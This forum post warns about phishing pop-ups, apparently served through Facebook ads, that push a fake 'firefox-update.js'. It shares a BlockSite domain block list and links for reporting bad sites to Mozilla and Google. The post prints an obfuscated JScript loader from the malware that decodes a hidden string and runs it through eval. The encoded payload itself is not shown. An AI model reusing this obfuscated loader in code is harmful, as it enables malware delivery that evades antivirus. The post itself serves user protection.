Sharing this here in case anyone is interested in adding a Black List to their Firefox to block trouble spots on the internet from ever being navigated to from Firefox.
I added BlockSite add-on to my Firefox browsers on my systems and created a short blacklist that I am going to build up and add to.
Here is the add-on I am using that works well. Easy to set up and manage:
https://addons.mozilla.org/en-US/firefox/addon/blocksite/Here is my current black list:
[BlockSite]
*eekumyoutube*
*meihitravelfeeder*
*liirawynagrodzenia*
*eatadresumedropbox*
I started use of this BlockSite add-on because some computers both at home and elsewhere have had Phishing Attacks trying to get people to download and run a firefox-update.js ranging in sizes of ( 6.5kb, 338kb, and 482kb ). Screenshot below shows an example of this Phishing Attack.
Worst of all is that MalwareBytes Free edition, Microsoft Security Essentials, and McAfee Free edition all say that these .js files are safe, no problems detected. Yet looking at the source code in the script it has malicious intent to infect Firefox.
Here is a code snippet from a 6.5kb fake firefox update:
var lubjgros=odubo+lni+ksfyw+fivu+cqe+asq;
function loa(a){return a;};
var rrr="ev";
var sir="Scr"+"ipt"+"ing."+loa("Di"+"ct"+loa("i"+"o"+"n"+"a"+"r"+"y"));
var d = new ActiveXObject(sir);
d.Add("a","3");
var t=+d.Item("a");
var rjdmefbshp="";
var trurghaaq=t;
var rrooaufpn=lubjgros["sp"+"l"+"i"+"t"]("");
var am="gth";
for (a=0;a<rrooaufpn["len"+am];
a +=trurghaaq){ rjdmefbshp=rjdmefbshp+rrooaufpn[a];}
var ikvcfnino="";
if(t==3){ikvcfnino=rrr+"a";}
if(t==3){ikvcfnino +="l";}
var iehtbcmcc=this;
var hkthfwmtez=iehtbcmcc[ikvcfnino];
var iepizmswd=hkthfwmtez;
iepizmswd(rjdmefbshp);If anyone else decides to use this Block Site Add-on and creates a black list. Please share your blacklist here so we can share and protect ourselves from this by expanding our blacklists.Years ago I went the route of setting up white lists but the problem with that is that it was a pain having to add each and every new website that i want to navigate to to a list of trusted sites. So I went years without blockers, but this Phishing issue that started in June 2016 and recently has been more frequent has been really annoying. All systems are clean of infections and it seems as though the thing in common with each phishing attack attempt has been that Facebook is open and something there, an ad or flash game or something has a random chance of passing a pop up of this phishing attack. The URL path acts as a 1 time shot to infect and then it becomes a dead link. If you try to go back to the URL by copying and pasting it to try to go back to it later, you get a white screen and not this phishing attack with a firefox-update.js download that wants you to click to download and run.
Hoping this helps to protect others. I will add updates here to my Block Site black list if anyone is interested in blocking trouble maker sites.
Below is example of the phishing attack and then when navigating to the site later it hides itself so you cant prove to Mozilla that they have malicious intent. I have been passing the bad URLs also to Mozilla to be notified. Not sure if they can do anything about it, but at least they are then made aware of site locations that are phishing to infect people trying to trick people into infecting their browsers.
Here is the link to notify Mozilla of bad sites:
https://www.mozilla.org/en-US/about/legal/fraud-report/Also Google has a way to get notified as well for malicious sites:
If you are reporting a site distributing malware or engaged in phishing, please also report the site to the Google Safe Browsing Team.
https://safebrowsing.google.com/safebrowsing/report_badware/?hl=enNote: The reporting of bad domains to Google has to be done before adding that bad site to Block Site black list. I had to go back and delete the block for the latest phishing attack in order to submit the URL to Google. Then go back and add the entry to black list the bad domain. So if reporting trouble maker sites, you have to do that first before setting the rule to block the bad site in the black list.
[attachment deleted by admin to conserve space]
